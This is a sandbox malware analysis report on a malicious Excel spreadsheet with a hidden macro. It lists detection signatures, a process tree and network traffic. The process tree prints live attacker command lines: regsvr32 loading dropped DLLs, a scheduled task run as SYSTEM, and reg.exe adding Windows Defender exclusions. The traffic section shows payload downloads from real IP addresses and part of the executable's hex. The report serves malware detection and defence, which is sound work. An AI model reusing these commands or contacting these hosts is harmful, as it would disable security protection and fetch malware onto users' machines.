Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Claim-1368769328-09242021.xls

Overview

General Information

Sample Name:Claim-1368769328-09242021.xls
Analysis ID:489877
MD5:20b670d4bfd3e5480e7c27cba0c3e11e
SHA1:167b4de3034917861c38fa6812bd43d5a4ad6a18
SHA256:e2de3e8aee223f11eddfbb081fa78779b71ba5cb1d3ef657e9b8b3f16406b09a
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2800 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2792 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2208 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2004 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2016 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2244 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 2524 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2212 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 1704 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2032 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2600 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 448 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2076 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 3048 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 244 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2860 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Claim-1368769328-09242021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1928, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 2800
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2800, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 2792

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2208, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42, ProcessId: 2004

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.497957177.0000000002791000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.497775026.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.500256751.0000000002791000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.552041458.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.563384856.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,5_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0008AEB4 FindFirstFileW,FindNextFileW,6_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44463.7272820602[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 15:26:58 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.7272820602.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 15:27:03 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.7272820602.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 15:27:14 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.7272820602.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.498695724.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.496898931.0000000000A90000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.553114227.0000000001DA0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551291821.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.564152659.00000000009B0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.558923277.0000000000BF0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.553204849.0000000002120000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].datJump to behavior
    Source: global trafficHTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
